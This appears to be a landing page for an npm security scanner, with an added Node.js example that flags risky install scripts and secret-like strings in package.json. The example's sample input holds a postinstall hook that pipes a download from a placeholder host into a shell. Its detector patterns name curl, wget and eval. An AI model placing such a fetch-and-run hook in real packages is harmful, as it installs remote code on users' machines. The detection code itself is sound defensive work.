Every commit. Every push. Every dependency change.
Automatically scan your Node.js projects for vulnerabilities, malware packages, leaked secrets, and supply chain attacks. Paste package.json to get an instant risk summary without login.
You ship code. We make sure it's clean.
Different tools solve different security problems. NpmJaagratha focuses on malware-like behavior, drainers, obfuscation, sketchy scripts, and supply-chain risks, not just known CVEs.
[scan] repo connected from GitHub App
[scan] package-lock parsed, 42 dependencies mapped
[alert] 1 suspicious install script isolated
[alert] exposed token signature matched entropy rule
[result] risk score adjusted to 73/100
Built for developers who want a fast, no-login risk check.
A premium security layer for npm projects, tuned for developers who want strong signals without noise and a clean paste-in workflow.
Vulnerability Scanning
Track known CVEs across every dependency update.
Secret Detection
Catch exposed API keys, tokens, and env leaks early.
Supply Chain Protection
Spot compromised packages and risky maintainer paths.
Malware Package Detection
Flag suspicious install scripts and malicious payloads.
Dependency Risk Scoring
Rank packages by trust signals and exploitability.
GitHub PR Security Checks
Comment on pull requests with precise remediation.
A clean flow from pasted package.json to instant protection.
The flow stays simple. The signal stays strong. Your team gets security context where it matters most.
Paste package.json
Drop in a package.json file or snippet and start the scan instantly.
Push code
Every push, PR, and lockfile change becomes a security checkpoint.
Automatic scans run
NpmJaagratha checks dependencies, scripts, and secrets in real time.
Get instant alerts and fixes
Receive actionable comments, dashboards, and risk scores.
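As an added illustration of the paste-in check described above (this is not NpmJaagratha's own code; the lifecycle-script patterns, the 4.0 bits/char entropy threshold and the sample package.json are assumptions made for the example), a small Node.js scanner that flags lifecycle install scripts and high-entropy string values in a pasted package.json:

```javascript
// Added example, not the product's code. Flags two of the signals the page
// lists: risky lifecycle scripts and entropy-matched secrets in package.json.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];
// Assumed patterns: an install step that fetches or decodes and executes code.
const RISKY = [/curl\s/, /wget\s/, /\|\s*(sh|bash)\b/, /node\s+-e\b/,
               /base64\s+(-d|--decode)/, /eval\(/];

// Shannon entropy in bits per character.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// A single long token with high entropy looks like an embedded credential.
// The 20-char / 4.0 bits-per-char cut-offs are assumptions, not the product's.
function looksLikeSecret(value, minLen = 20, minEntropy = 4.0) {
  return typeof value === 'string' && value.length >= minLen &&
    !/\s/.test(value) && shannonEntropy(value) >= minEntropy;
}

function scanPackageJson(text) {
  const pkg = JSON.parse(text);
  const findings = [];
  for (const name of LIFECYCLE) {
    const cmd = pkg.scripts && pkg.scripts[name];
    if (!cmd) continue;
    const hit = RISKY.find((re) => re.test(cmd));
    findings.push({ rule: hit ? 'suspicious-install-script' : 'lifecycle-script',
                    script: name, cmd });
  }
  // Walk every string value in the document for entropy matches.
  const walk = (node, path) => {
    if (typeof node === 'string') {
      if (looksLikeSecret(node)) findings.push({ rule: 'high-entropy-string', path });
    } else if (node && typeof node === 'object') {
      for (const [k, v] of Object.entries(node)) walk(v, path ? `${path}.${k}` : k);
    }
  };
  walk(pkg, '');
  return findings;
}

// Constructed sample input; the token is random-looking, not a real secret.
const SAMPLE = JSON.stringify({
  name: 'demo-app',
  scripts: { build: 'tsc', postinstall: 'curl -s https://example.invalid/x | sh' },
  config: { apiToken: 'k7Qx2PzM9vLb4RtN8wCj3YdH6fSg1Ae0' },
});
console.log(scanPackageJson(SAMPLE));
```

Run with `node scan.js`; the sample yields one suspicious postinstall finding and one high-entropy string at `config.apiToken`.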
Deep checks for every package move.
Risk moves with every commit.
LATEST NPM VULNERABILITIES
Real-time feed of reviewed security advisories affecting the npm ecosystem, sourced from the GitHub Advisory Database.
GHSA-38m6-82c8-4xfm
Parse Server pre-authentication denial of service via client version header regex backtracking
GHSA-q8mj-m7cp-5q26
qs stringify crash on null and undefined entries in comma-format arrays
GHSA-j3vx-cx2r-pvg8
Network-AI unauthenticated cross-origin MCP tool invocation via empty default secret
GHSA-f396-4rp4-7v2j
Boxlite path traversal leading to arbitrary file write on the host
Reviewed advisories are streamed from NPMSCan's RSS feed and can be surfaced inside the product feed view.
Use this section for high-signal alerts, release notes, and the latest ecosystem-wide risk changes.
Subtle cultural touch. Premium security tone.
event-stream-like behavior flagged in the latest tree update.
A newly introduced package has an unusual install script and low trust signals.
Lockfile diff reviewed. No secret leaks and no suspicious postinstall scripts.
Paste a package.json and get a risk summary in seconds.
No install, no login, no API keys. Start with a package.json snippet or file, and NpmJaagratha flags vulnerable dependencies, drainers, suspicious scripts, and supply-chain attacks immediately.